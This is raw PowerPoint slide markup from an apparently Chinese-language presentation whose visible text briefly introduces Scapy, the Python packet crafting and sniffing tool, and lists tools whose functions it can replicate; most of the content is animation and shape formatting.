                                      <p:cBhvr>
                                        <p:cTn id="21" dur="750" spd="-100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="6927" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="22" presetID="35" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="1250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.028 1.11111E-6 L 4.16667E-6 1.11111E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="1393" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="24" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="50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63" presetClass="path" presetSubtype="0" decel="50000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.01523 1.11111E-6 L -0.10885 1.11111E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="750" spd="-100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-6211" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="29" presetID="35" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="1250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.01602 1.11111E-6 L -2.08333E-7 1.11111E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="24"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-807" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="31" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="50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42" presetClass="path" presetSubtype="0" decel="30000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 1.875E-6 -0.03982 L 1.875E-6 0.14814 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="750" spd="-100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="9398"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="36" presetID="42" presetClass="path" presetSubtype="0" accel="30000" decel="30000" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="1250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 1.875E-6 -0.03982 L 1.875E-6 4.44444E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="1991"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="38" presetID="16" presetClass="entr" presetSubtype="42" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="1000"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="barn(outHorizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="41" presetID="16" presetClass="entr" presetSubtype="42" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="1000"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="barn(outHorizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="43"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bldLvl="0" animBg="1"/>
      <p:bldP spid="2" grpId="2" bldLvl="0" animBg="1"/>
      <p:bldP spid="24" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="24" grpId="1" bldLvl="0" animBg="1"/>
      <p:bldP spid="24" grpId="2" bldLvl="0" animBg="1"/>
      <p:bldP spid="25" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="25" grpId="1" bldLvl="0" animBg="1"/>
      <p:bldP spid="25" grpId="2"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52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1067052" y="330463"/>
            <a:ext cx="3100387" cy="701040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="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Scapy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000"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59" name="椭圆 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1513373" y="1411077"/>
            <a:ext cx="205838" cy="205838"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:schemeClr val="bg1">
                  <a:alpha val="80000"/>
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="100000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BFBFBF">
                  <a:alpha val="70000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect t="100000" r="100000"/>
            </a:path>
            <a:tileRect l="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="571500" dist="508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algn="ctr"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="9600">
              <a:solidFill>
                <a:srgbClr val="41AAD5"/>
              </a:solidFill>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="矩形 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1976120" y="1634490"/>
            <a:ext cx="8563610" cy="749300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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Scapy是一个可以让用户发送、侦听和解析并伪装网络报文的Python程序。这些功能可以用于制作侦测、扫描和攻击网络的工具。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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62" name="椭圆 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1513373" y="2988640"/>
            <a:ext cx="205838" cy="205838"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:schemeClr val="bg1">
                  <a:alpha val="80000"/>
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="100000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BFBFBF">
                  <a:alpha val="70000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect t="100000" r="100000"/>
            </a:path>
            <a:tileRect l="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="571500" dist="508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algn="ctr"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="9600">
              <a:solidFill>
                <a:srgbClr val="41AAD5"/>
              </a:solidFill>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="矩形 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1976120" y="2736215"/>
            <a:ext cx="8563610" cy="1920240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"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Scapy 是一个强大的操纵报文的交互程序。它可以伪造或者解析多种协议的报文，还具有发送、捕获、匹配请求和响应这些报文以及更多的功能。Scapy 可以轻松地做到像扫描(scanning)、路由跟踪(tracerouting)、探测(probing)、单元测试(unit tests)、攻击(attacks)和发现网络(network discorvery)这样的传统任务。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"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65" name="椭圆 64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1513189" y="4853412"/>
            <a:ext cx="205838" cy="205838"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:schemeClr val="bg1">
                  <a:alpha val="80000"/>
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="100000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BFBFBF">
                  <a:alpha val="70000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect t="100000" r="100000"/>
            </a:path>
            <a:tileRect l="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="571500" dist="508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algn="ctr"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="9600">
              <a:solidFill>
                <a:srgbClr val="41AAD5"/>
              </a:solidFill>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="华文细黑" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="矩形 92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1975485" y="4758055"/>
            <a:ext cx="8564245" cy="749300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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它可以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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hping,arpspoof,arp-sk,arping,p0f 甚至是部分的Namp,tcpdump和tshark 的功能。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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97" name="椭圆 96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1436517" y="1334220"/>
            <a:ext cx="359551" cy="359551"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="lg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a:solidFill>
                <a:schemeClr val="tx1"/>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98" name="椭圆 97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1436517" y="2911783"/>
            <a:ext cx="359551" cy="359551"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="lg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a:solidFill>
                <a:schemeClr val="tx1"/>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99" name="椭圆 98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1436333" y="4776555"/>
            <a:ext cx="359551" cy="359551"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="lg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a:solidFill>
                <a:schemeClr val="tx1"/>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9"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75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750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="53"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="8" presetID="21" presetClass="entr" presetSubtype="1" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="97"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wheel(1)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="97"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="21" presetClass="entr" presetSubtype="1" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="98"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wheel(1)">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="98"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="14" presetID="21" presetClass="entr" presetSubtype="1" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="99"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wheel(1)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="99"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="17" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="59"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="22" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="62"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="62"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="62"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="62"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="27" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="65"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="65"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="65"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="65"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="32" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="2750"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="61"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="61"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
